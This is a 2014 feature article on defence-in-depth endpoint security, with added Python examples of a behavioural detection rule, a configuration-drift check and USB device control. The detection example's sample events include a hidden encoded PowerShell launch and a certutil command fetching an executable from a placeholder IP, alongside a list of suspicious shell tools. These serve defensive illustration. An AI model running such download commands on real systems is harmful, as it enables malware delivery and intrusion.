Feature

How to use defence in depth to secure endpoint machines

Arguably the most important task of any endpoint security system is to protect against malware.

However, these products are becoming less effective as attackers develop increasingly novel ways of evading device security.

The accuracy of antimalware technology has noticeably improved over the years but, at heart, only a few applications’ behaviours are profiled, typically the most used ones – Microsoft Office, Java, Adobe Acrobat, Flash and browsers.

Any anomalous behaviour exhibited by these profiled applications can be picked up by an agent, which deals with the threat by blocking the unauthorised action. Admittedly, this covers a lot of ground in the workaday use of a device, but it is clearly not a panacea: an intruder can target less obvious applications on the device instead, for which the agent has no behavioural model.
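As an added illustration (not part of the original article), the Python sketch below shows the kind of behavioural rule such an agent applies to the few applications it profiles, and where that coverage ends. The application names, paths, users and sample events are constructed to resemble Windows process-creation telemetry; the optional profile_all mode is an assumption about how a broader rule might be tuned, not a feature of any particular product.

```python
"""Added example (not from the original article): a toy behavioural rule of
the kind an endpoint agent applies to the few applications it profiles.

The rule flags a profiled application (Office, Acrobat, Java, a browser)
launching a shell or script host, which is rarely legitimate. The events
below are constructed to resemble Windows process-creation records (the
ParentImage / Image / CommandLine fields of a Sysmon event 1); every path,
user and program name is illustrative.
"""
from __future__ import annotations
from dataclasses import dataclass

# Applications the agent has a behavioural profile for (as the article lists).
PROFILED_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "acrord32.exe", "acrobat.exe", "java.exe", "javaw.exe",
    "chrome.exe", "firefox.exe", "iexplore.exe",
}
# Children that a document reader or browser has no business spawning.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}
# Parents for which spawning a shell is normal (e.g. a user opening a terminal).
SYSTEM_PARENTS = {"explorer.exe", "services.exe", "svchost.exe"}


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: ProcessEvent, profile_all: bool = False) -> str:
    """Classify one process-creation event.

    'block' - a profiled application spawned a shell or script host
    'alert' - (profile_all only) any other non-system parent did the same;
              worth a look, but too noisy to block outright
    'allow' - nothing matched
    """
    parent, child = _basename(event.parent_image), _basename(event.image)
    if child not in SUSPICIOUS_CHILDREN:
        return "allow"
    if parent in PROFILED_PARENTS:
        return "block"
    if profile_all and parent not in SYSTEM_PARENTS:
        return "alert"
    return "allow"


def triage(events, profile_all: bool = False):
    """Decision for each event, in order."""
    return [evaluate(e, profile_all) for e in events]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Macro-laden document: Word launches an encoded PowerShell command.
    ProcessEvent(r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -nop -w hidden -enc <base64 payload>", r"CORP\alice"),
    # Browser spawning its own renderer process: normal.
    ProcessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 "chrome.exe --type=renderer", r"CORP\alice"),
    # Hypothetical unprofiled line-of-business app doing the same as Word:
    # the profiled-apps rule does not see it, which is the article's caveat.
    ProcessEvent(r"C:\Program Files\AcmeInventory\inventory.exe",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/u.exe", r"CORP\bob"),
]

if __name__ == "__main__":
    for e, d in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{d:5}  {_basename(e.parent_image)} -> {_basename(e.image)}")
    print("with profile_all:", triage(SAMPLE_EVENTS, profile_all=True))
```

Run as written, the first event is blocked, the second allowed, and the third, which is the same technique launched from an unprofiled application, is also allowed; only the broader profile_all mode surfaces it, at the cost of more events to review.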

Endpoint security is not just about detecting and eradicating malware. It is also about making sure devices are properly patched, configured and controlled, to reduce the attack surface as much as possible. Endpoint agents need to work with patch management systems so that, as soon as an organisation has tested a patch, it can be rolled out to devices. Those devices should in turn be configured for use on the infrastructure according to rules defined by the IT department.

Such rules should govern which applications are installed, which services run, device settings and the other security products present on the device. It should be part of the IT department's policy to identify when a configuration has changed from that baseline, as this may indicate that malware has manipulated it to compromise the device.
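An added example, not from the original article, of how an agent might check a device's reported configuration against the IT department's baseline and flag drift, distinguishing a protection that has been switched off from a less urgent deviation. The setting names, values and service names are constructed for illustration; a real agent would collect them from the registry, WMI or its management platform.

```python
"""Added example (not from the original article): comparing an endpoint's
current security configuration with the IT department's baseline, so that
a protection switched off, a missing patch level or an unknown running
service is reported rather than silently tolerated.

All setting names and values are constructed for illustration; a real
agent would read them from the registry, WMI or the management platform.
"""
from __future__ import annotations
from dataclasses import dataclass
from typing import Any


@dataclass
class Drift:
    setting: str
    expected: Any
    actual: Any
    severity: str  # 'critical' when a protection is weakened, else 'warning'


# Settings whose deviation means a protection was disabled or downgraded.
PROTECTIONS = {"firewall_enabled", "realtime_av_enabled",
               "autorun_disabled", "disk_encryption"}


def compare(baseline: dict, current: dict) -> list[Drift]:
    """Return every setting where the device differs from the baseline.

    Set-valued settings (such as running services) drift when anything was
    added or removed; scalar settings drift on any difference. A setting
    absent from the device report counts as drift too.
    """
    drifts = []
    for key, expected in baseline.items():
        severity = "critical" if key in PROTECTIONS else "warning"
        if isinstance(expected, (set, frozenset)):
            reported = current.get(key, ())
            actual = set(reported) if isinstance(reported, (set, frozenset, list, tuple)) else set()
            if actual - expected or expected - actual:
                drifts.append(Drift(key, set(expected), actual, severity))
        else:
            actual = current.get(key, "<missing>")
            if actual != expected:
                drifts.append(Drift(key, expected, actual, severity))
    return drifts


def needs_quarantine(drifts: list[Drift]) -> bool:
    """True when any protection was weakened; such a device should be isolated."""
    return any(d.severity == "critical" for d in drifts)


def report(drifts: list[Drift]) -> list[str]:
    """Human-readable lines for the console or ticket."""
    return [f"[{d.severity}] {d.setting}: expected {d.expected!r}, found {d.actual!r}"
            for d in drifts]


# Constructed baseline and device report (illustrative values).
BASELINE = {
    "firewall_enabled": True,
    "realtime_av_enabled": True,
    "autorun_disabled": True,
    "disk_encryption": "full",
    "os_patch_level": "2014-08",
    "running_services": frozenset({"wuauserv", "MpsSvc", "WinDefend", "Spooler"}),
}
DEVICE_REPORT = {
    "firewall_enabled": True,
    "realtime_av_enabled": False,    # real-time scanning switched off
    "autorun_disabled": True,
    "disk_encryption": "full",
    "os_patch_level": "2014-06",     # two months behind the tested baseline
    "running_services": {"wuauserv", "MpsSvc", "WinDefend", "Spooler", "UpdaterSvcX"},  # unknown extra service (constructed)
}

if __name__ == "__main__":
    found = compare(BASELINE, DEVICE_REPORT)
    print("\n".join(report(found)))
    print("quarantine:", needs_quarantine(found))
```

On the constructed report this produces three drift entries: the disabled real-time scanner is critical and marks the device for isolation, while the stale patch level and the unknown service are warnings for the operator to chase.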

Device control is important, as it allows the IT department to enforce policy on who can use USB ports and how. What is copied to and from a USB device or SD card can be logged, so that data leaving or entering the organisation through removable media can be traced.
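An added example (not from the article) of the decision logic behind such a device-control policy and the audit record it writes for every attempted copy, whether allowed or denied. Group names, device identifiers, serial numbers, users and file names are constructed; the rule that the most restrictive group wins is a design choice made here, not something the article prescribes.

```python
"""Added example (not from the original article): the decision logic of a
removable-media (device control) policy, plus the audit record written for
every attempted copy. Group names, device identifiers, users and file names
are constructed for illustration.
"""
from __future__ import annotations
from dataclasses import dataclass
from datetime import datetime, timezone
import json


@dataclass(frozen=True)
class UsbDevice:
    vendor_id: str
    product_id: str
    serial: str


# Corporate-issued encrypted drives, recognised by serial number (constructed).
APPROVED_SERIALS = {"CORP-ENC-0001", "CORP-ENC-0002"}

# Access per group for approved and for foreign media.
#   none       - device may not be mounted
#   read       - files may be copied from the device to the endpoint only
#   read-write - copies in both directions
GROUP_POLICY = {
    "finance":     {"approved": "read-write", "foreign": "none"},
    "engineering": {"approved": "read-write", "foreign": "read"},
    "contractor":  {"approved": "read",       "foreign": "none"},
}
DEFAULT_POLICY = {"approved": "read", "foreign": "none"}
_RANK = {"none": 0, "read": 1, "read-write": 2}


def access_level(groups, device: UsbDevice) -> str:
    """Effective access for a user in `groups` to `device`.

    Design choice: when a user is in several groups the most restrictive
    level wins (least privilege), rather than the most permissive.
    """
    kind = "approved" if device.serial in APPROVED_SERIALS else "foreign"
    levels = [GROUP_POLICY.get(g, DEFAULT_POLICY)[kind] for g in groups] or [DEFAULT_POLICY[kind]]
    return min(levels, key=_RANK.__getitem__)


def authorise_copy(user: str, groups, device: UsbDevice, direction: str,
                   path: str, size_bytes: int) -> tuple[bool, dict]:
    """Decide one copy ('to_device' or 'from_device') and build its audit record.

    Denied attempts are recorded as well as allowed ones: a refused copy of a
    sensitive file is exactly the event an investigation wants to find later.
    """
    if direction not in ("to_device", "from_device"):
        raise ValueError(f"unknown direction {direction!r}")
    level = access_level(groups, device)
    allowed = level == "read-write" or (level == "read" and direction == "from_device")
    record = {
        "ts": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "user": user,
        "device": f"{device.vendor_id}:{device.product_id}:{device.serial}",
        "approved_device": device.serial in APPROVED_SERIALS,
        "direction": direction,
        "path": path,
        "size_bytes": size_bytes,
        "level": level,
        "decision": "allow" if allowed else "deny",
    }
    return allowed, record


def audit_line(record: dict) -> str:
    """One JSON line per event, ready for a log shipper."""
    return json.dumps(record, sort_keys=True)


if __name__ == "__main__":
    corp = UsbDevice("1234", "5678", "CORP-ENC-0001")
    stick = UsbDevice("1234", "5678", "4C53000123456789")  # personal stick, constructed serial
    for user, groups, dev, direction, path in [
        ("alice", ["engineering"], stick, "to_device", "Q3-forecast.xlsx"),
        ("alice", ["engineering"], stick, "from_device", "vendor-driver.zip"),
        ("bob", ["finance", "engineering"], stick, "from_device", "notes.txt"),
        ("bob", ["finance"], corp, "to_device", "payroll-2014-08.csv"),
    ]:
        allowed, rec = authorise_copy(user, groups, dev, direction, path, 120_000)
        print(audit_line(rec))
```

With these constructed rules, an engineer can pull a driver off a personal stick but not push a spreadsheet onto it, a user who is in both finance and engineering is held to finance's stricter rule, and a corporate encrypted drive accepts payroll data; every attempt, including the refused ones, ends up as a JSON line in the log.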

Top tips and best practices for endpoint security

Cyber criminals want to profit from hacking into your infrastructure, so follow these top tips and implement best practice to ensure they don’t get in:
  • Make sure your security policy is adaptable, robust and covers all endpoints. A well-written security policy will enable your IT department to know when to act – such as when browsers are out of date or operating systems need patching – to avoid malware finding its way to endpoint devices. But don’t limit your thinking to computing devices. Anywhere data is stored is a risk. This could mean USB sticks and consumer cloud storage as well.
  • Anticipate a data breach and plan accordingly. If a data breach occurs in your organisation, you don’t want to be working out only then who the relevant people to inform are. Keep a list of the most important people and stakeholders in your organisation and make plans for dealing with these kinds of situations. These plans should include: who will do what; what steps must be taken and when; and how the situation is to be cleaned up after the incident.
  • Make sure users know what to do to keep safe. Employees will use their devices to access resources on the infrastructure, so it is wise to make sure they know the dangers, as they can be the weakest link in an organisation’s security. If one user falls prey to a phishing attack, it could be enough for hackers to gain entry into the network. Emphasise the personal benefits of keeping to security policies to make users stick to them.
  • Identify sensitive data and encrypt it wherever it goes. Sensitive data – such as financial and human resources records, intellectual property, and contact and customer lists – must be inventoried, so the business understands what it could lose in a breach. It should be encrypted not only when it resides on a file server, but also in transit and on the endpoint. A good endpoint security system will ensure this policy is adhered to and, alongside strong passwords, sensitive documents can be safeguarded.
  • Test for leaks. Assuming that, just because you have implemented an endpoint security system, you are safe is a bad idea; it needs to be tested to be sure. Third-party companies can help identify problems that the IT department may have overlooked.

How BYOD and mobility affect endpoint security

Traditional endpoint device management software isn’t up to the job of managing PCs, laptops and tablets, especially in a bring your own device (BYOD) environment, according to Ashley Leonard, chief executive of Verismic.

He says that traditional device management software can take “days or even weeks to deploy” because of agents required on each device. “Moves, adds and changes frequently cause black spots in data, making BYOD environments particularly difficult to manage,” he says. “Some endpoint management software even requires manual ‘Sneaker Net’ deployment of software, affecting users, IT departments and costs.”

He says this leaves organisations open to security threats through unlicensed and unpatched software applications and can even present compliance risk. But forbidding BYOD is not an option for many organisations. “Employees will use their personal devices anyway or use devices provided by the business for personal use,” says Louise Bulman, Europe vice-president of ForeScout. “The traditional enterprise perimeter is becoming more open and extended as the number of mobile and remote employees increases.”

Anand Sukumaran, vice-president of managed services at ITC Infotech, says businesses should consider replacing BYOD with “choose your own device” (CYOD). “This hybrid approach means a company will offer a choice of a selection of devices for remote and flexible working, with the user free to use it in their personal life as well,” he says.

More platforms – more ways in or more resilience to failure?

BYOD projects create a multitude of platforms to protect. Not only does the IT manager need to protect PCs and laptops running Windows, but also phones and tablets running Android and iOS. Further down the line, organisations may need to consider protecting internet of things endpoints, such as sensors and wearable technology.

A criminal looking to infiltrate infrastructure has many tools at their disposal. If they can’t get in via a desktop or laptop, then a mobile device may offer a way in.

Securing mobile endpoints requires a slightly different strategy, because mobile operating systems sandbox apps to isolate them from one another and from the operating system (OS). Antivirus apps are sandboxed too, which limits what they can inspect and may render them largely ineffective. The data on the device is what matters most, and it needs to be protected and encrypted whether it is stored on the device or sent back and forth over the corporate network.

However, having multiple platforms can provide a modicum of protection, in so far as a device running one platform will not fall victim to malware written for another. An employee may have an infected PC quarantined from the network, but could still access data and remain productive from a smartphone running a completely different platform.

What to think about when buying endpoint security

The three most important concerns in buying an endpoint security system are what it does, how it is managed and what platforms/devices it protects. The application on the endpoint itself must include, at a minimum: antivirus, antispyware, host-based intrusion prevention and a firewall. More advanced systems will also include device and application control, patch management assessment, URL filtering, data loss prevention, network access control and disk encryption.

There should be management features to allow administrators to look after part or all of the infrastructure. The console should include a dashboard where an administrator can quickly access users, groups and devices, as well as the policies to apply to these elements. These policies should be easily accessible and simple to create and update, as needs change. It should be easy to quickly discover and protect new endpoints. These can then be brought into management where they can be monitored and problems remediated quickly and safely.

Any endpoint security system should be able to protect all endpoints. Failure to do so will make such products at best useless to the organisation and, at worst, allow malicious actors to gain access to corporate assets through the endpoints left uncovered.


This was first published in August 2014